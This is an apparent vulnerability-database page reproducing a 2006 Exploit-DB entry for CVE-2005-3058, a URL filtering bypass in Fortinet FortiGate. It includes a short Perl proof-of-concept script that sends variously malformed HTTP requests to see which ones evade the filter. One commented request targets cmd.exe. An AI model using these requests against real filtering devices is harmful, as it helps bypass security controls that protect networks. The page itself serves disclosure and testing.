Lucene search
+L

Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass

🗓️ 13 Feb 2006 00:00:00Reported by Mathieu DessusType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 51 Views

Fortinet Fortigate 2.x/3.0 URL Filtering Bypass vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2005-3058
14 Feb 200619:00
cve
cvelist
Cvelist
CVE-2005-3058
14 Feb 200619:00
cvelist
euvd
EUVD
EUVD-2005-3058
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-3058
31 Dec 200505:00
nvd
packetstorm
Packet Storm
Fortinet-url.txt
14 Feb 200600:00
packetstorm
prion
Prion
Hardcoded credentials
4 Sep 200910:30
prion
securityvulns
securityvulns
[Full-disclosure] URL filter bypass in Fortinet
13 Feb 200600:00
securityvulns
source: https://www.securityfocus.com/bid/16599/info

Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering.

FortiGate devices running FortiOS v2.8MR10 and v3beta are vulnerable to this issue. Other versions may also be affected.

# http_req.pl
#
# Made by (Mathieu Dessus)
#
# Make a filter for /test* URL in the Fortigate and
# remove the # depending on which HTTP request you want to test

use IO::Socket;

$target = '1.2.3.4';

# Detected
$data = "GET /test HTTP/1.1\r
Host: $target\r
Pragma: no-cache\r
Accept: */*\r
\r
";
# Not detected
$data = "GET /test2 HTTP/1.1
Host: $target
Pragma: no-cache
Accept: */*

";

# Not detected
$data = "GET /test3 HTTP/1.0\r\n\r\n";
# Detected
#$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n";
# Detected :)
#$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";


my $sock = new IO::Socket::INET (
                                  PeerAddr => $target,
                                  PeerPort => '80',
                                  Proto => 'tcp',
                                 );
die "Could not create socket: $!\n" unless $sock;
print $sock $data;
read($sock, $ret, 600);
print($ret."\n");
close($sock);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jul 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03093
51